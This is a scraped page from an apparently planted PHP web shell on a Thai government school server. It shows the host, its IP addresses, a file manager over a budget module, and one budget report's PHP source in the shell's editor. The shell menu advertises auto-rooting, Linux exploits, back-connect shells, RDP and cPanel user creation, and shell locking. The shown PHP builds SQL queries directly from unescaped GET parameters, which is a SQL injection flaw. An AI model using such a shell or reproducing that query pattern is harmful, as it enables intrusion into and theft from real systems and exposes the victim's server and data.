Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
budget /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
approve.php
20.37
KB
-rwxr-xr-x
approve_reserve.php
17.03
KB
-rwxr-xr-x
bud_book.php
15.15
KB
-rwxr-xr-x
budget_year.php
10.7
KB
-rwxr-xr-x
cancel_deega.php
12.45
KB
-rwxr-xr-x
cash_book.php
15.49
KB
-rwxr-xr-x
change_bud.php
19.67
KB
-rwxr-xr-x
change_ex_bud.php
22.41
KB
-rwxr-xr-x
change_income_bud.php
22.66
KB
-rwxr-xr-x
ex_bud_book.php
14.92
KB
-rwxr-xr-x
form1.php
14.16
KB
-rwxr-xr-x
form2.php
12.49
KB
-rwxr-xr-x
income_bud_book.php
14.99
KB
-rwxr-xr-x
livesearch.php
1.64
KB
-rwxr-xr-x
pay_bud.php
25.02
KB
-rwxr-xr-x
pay_check.php
25.89
KB
-rwxr-xr-x
pay_check_reserve.php
19.29
KB
-rwxr-xr-x
pay_ex_bud.php
29.83
KB
-rwxr-xr-x
pay_income_bud.php
22.75
KB
-rwxr-xr-x
permission.php
18.38
KB
-rwxr-xr-x
print_check.php
3.71
KB
-rwxr-xr-x
receive_bud.php
19.66
KB
-rwxr-xr-x
receive_ex_bud.php
24.18
KB
-rwxr-xr-x
receive_income_bud.php
24.01
KB
-rwxr-xr-x
refer_deega.php
8.07
KB
-rwxr-xr-x
refer_wd.php
9.41
KB
-rwxr-xr-x
report_1.php
12.31
KB
-rwxr-xr-x
report_10.php
6.31
KB
-rwxr-xr-x
report_10_2.php
8.67
KB
-rwxr-xr-x
report_10_3.php
7.79
KB
-rwxr-xr-x
report_10_4.php
7.17
KB
-rwxr-xr-x
report_12.php
10.69
KB
-rwxr-xr-x
report_12_2.php
6.12
KB
-rwxr-xr-x
report_12_3.php
7.82
KB
-rwxr-xr-x
report_13.php
9.17
KB
-rwxr-xr-x
report_1_mobile.php
11.19
KB
-rwxr-xr-x
report_2.php
6.39
KB
-rwxr-xr-x
report_21.php
17.04
KB
-rwxr-xr-x
report_23.php
8.06
KB
-rwxr-xr-x
report_3.php
9.5
KB
-rwxr-xr-x
report_4.php
6.38
KB
-rwxr-xr-x
report_5.php
5.96
KB
-rwxr-xr-x
report_8.php
6.5
KB
-rwxr-xr-x
report_9.php
8.54
KB
-rwxr-xr-x
report_pay_check.php
15.89
KB
-rwxr-xr-x
report_pay_check_reserve.php
13.11
KB
-rwxr-xr-x
reserve_money.php
29.05
KB
-rwxr-xr-x
return_ajax_proj.php
1.06
KB
-rwxr-xr-x
return_ajax_proj_2.php
859
B
-rw-r--r--
return_withdraw.php
26.73
KB
-rwxr-xr-x
today_report.php
16.29
KB
-rwxr-xr-x
withdraw.php
47.57
KB
-rwxr-xr-x
withdraw2.php
40.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : report_12_2.php
<?php defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); ?> <br /> <div align="center"> <font color="#006666" size="3"><strong>รายการฎีกาเบิกตามรหัสงบประมาณจำแนกตามงบรายจ่าย</strong></font> </div> <?php $t_month['01']="มค"; $t_month['02']="กพ"; $t_month['03']="มีค"; $t_month['04']="เมย"; $t_month['05']="พค"; $t_month['06']="มิย"; $t_month['07']="กค"; $t_month['08']="สค"; $t_month['09']="กย"; $t_month['10']="ตค"; $t_month['11']="พย"; $t_month['12']="ธค"; //ปีงบประมาณ $sql = "select * from budget_year where year_active='1' order by budget_year desc limit 1"; $dbquery = mysqli_query($connect,$sql); $year_active_result = mysqli_fetch_array($dbquery); if($year_active_result['budget_year']==""){ echo "<br />"; echo "<div align='center'>ยังไม่ได้กำหนดทำงานในปีงบประมาณใด ๆ กรุณาไปที่เมนูตั้งค่าระบบ เพื่อกำหนดปีงบประมาณ</div>"; exit(); } //กรณีเลือกปี $year_index=$_REQUEST['year_index']; if($year_index==""){ $year_index=$year_active_result['budget_year']; } //จบส่วนปีงบประมาณ $sql = "select id from budget_deega where project='$_GET[project]' and pay_group='$_GET[pay_group]' and budget_year='$year_index' "; $dbquery = mysqli_query($connect,$sql); $num_rows = mysqli_num_rows($dbquery ); //ส่วนของการแยกหน้า $pagelen=20; //จำนวนข้อมูลต่อหน้า $url_link="option=budget&task=main/report_12_2&year_index=$year_index&project=$_REQUEST[project]&pay_group=$_REQUEST[pay_group]"; // 2_กำหนดลิงค์ฺ $totalpages=ceil($num_rows/$pagelen); if(!isset($_REQUEST['page'])){ $_REQUEST['page']=""; } if($_REQUEST['page']==""){ $page=$totalpages; if($page<2){ $page=1; } } else{ if($totalpages<$_REQUEST['page']){ $page=$totalpages; if($page<1){ $page=1; } } else{ $page=$_REQUEST['page']; } } $start=($page-1)*$pagelen; if(($totalpages>1) and ($totalpages<16)){ echo "<div align=center>"; echo "หน้า "; for($i=1; $i<=$totalpages; $i++) { if($i==$page){ echo "[<b><font size=+1 color=#990000>$i</font></b>]"; } else { echo "<a href=$PHP_SELF?$url_link&page=$i>[$i]</a>"; } } echo "</div>"; } if($totalpages>15){ if($page <=8){ $e_page=15; $s_page=1; } if($page>8){ if($totalpages-$page>=7){ $e_page=$page+7; $s_page=$page-7; } else{ $e_page=$totalpages; $s_page=$totalpages-15; } } echo "<div align=center>"; if($page!=1){ $f_page1=$page-1; echo "<<a href=$PHP_SELF?$url_link&page=1>หน้าแรก </a>"; echo "<<<a href=$PHP_SELF?$url_link&page=$f_page1>หน้าก่อน </a>"; } else { echo "หน้า "; } for($i=$s_page; $i<=$e_page; $i++){ if($i==$page){ echo "[<b><font size=+1 color=#990000>$i</font></b>]"; } else { echo "<a href=$PHP_SELF?$url_link&page=$i>[$i]</a>"; } } if($page<$totalpages) { $f_page2=$page+1; echo "<a href=$PHP_SELF?$url_link&page=$f_page2> หน้าถัดไป</a>>>"; echo "<a href=$PHP_SELF?$url_link&page=$totalpages> หน้าสุดท้าย</a>>"; } echo " <select onchange=\"location.href=this.options[this.selectedIndex].value;\" size=\"1\" name=\"select\">"; echo "<option value=\"\">หน้า</option>"; for($p=1;$p<=$totalpages;$p++){ echo "<option value=\"?$url_link&page=$p\">$p</option>"; } echo "</select>"; echo "</div>"; } //จบแยกหน้า $sql = "select * from budget_deega where project='$_GET[project]' and pay_group='$_GET[pay_group]' and budget_year='$year_index' order by deega_num limit $start,$pagelen "; $dbquery = mysqli_query($connect,$sql); echo "<br>"; echo "<table width='95%' border='0' align='center'>"; echo "<Tr><Td colspan='9' align='right'><INPUT TYPE='button' name='smb' value='<<กลับหน้า่ก่อน' onclick='location.href=\"?option=budget&task=main/report_12&year_index=$year_active_result[budget_year]\"'</Td></Tr>"; echo "<Tr bgcolor='#FFCCCC' align='center'><Td width='50'>ที่</Td><Td width='80'>ว/ด/ป</Td><Td width='80'>เลขที่ฎีกา</Td><Td width='100'>เลขที่เอกสาร</Td><Td>รายการ</Td><Td width='100'>ขอเบิก</Td><Td width='100'>ภาษี</Td><Td width='100'>รับจริง</Td><Td width='40'></Td></Tr>"; $N=(($page-1)*$pagelen)+1; //*เกี่ยวข้องกับการแยกหน้า $M=1; While ($result = mysqli_fetch_array($dbquery)) { $id = $result['id']; $doc= $result['doc']; $deega_num= $result['deega_num']; $item= $result['item']; $withdraw= $result['withdraw']; $withdraw=number_format($withdraw,2); $tax= $result['tax']; $tax=number_format($tax,2); $pay= $result['pay']; $pay=number_format($pay,2); $rec_date= $result['rec_date']; list($rec_year,$rec_month,$rec_day) = explode("-",$rec_date); $t_year=($rec_year+543)-2500; if(($M%2) == 0) $color="#FFFFC"; else $color="#FFFFFF"; echo "<Tr bgcolor=$color align='center'><Td>$N</Td><Td>$rec_day $t_month[$rec_month] $t_year</Td><Td>$deega_num</Td><Td align='left'>$doc</Td><Td align=left>$item</Td><Td align='right'>$withdraw</Td><Td align='right'>$tax</Td><Td align='right'>$pay</Td> <Td><div align='center'><font size=3><a href=?option=budget&task=main/report_12_3&year_index=$year_active_result[budget_year]&id=$id&page=$page&project=$_GET[project]&pay_group=$_GET[pay_group]><img src=images/browse.png border='0'></a></font></div></Td> </Tr>"; $M++; $N++; //*เกี่ยวข้องกับการแยกหน้า } echo "</Table>"; ?>
Close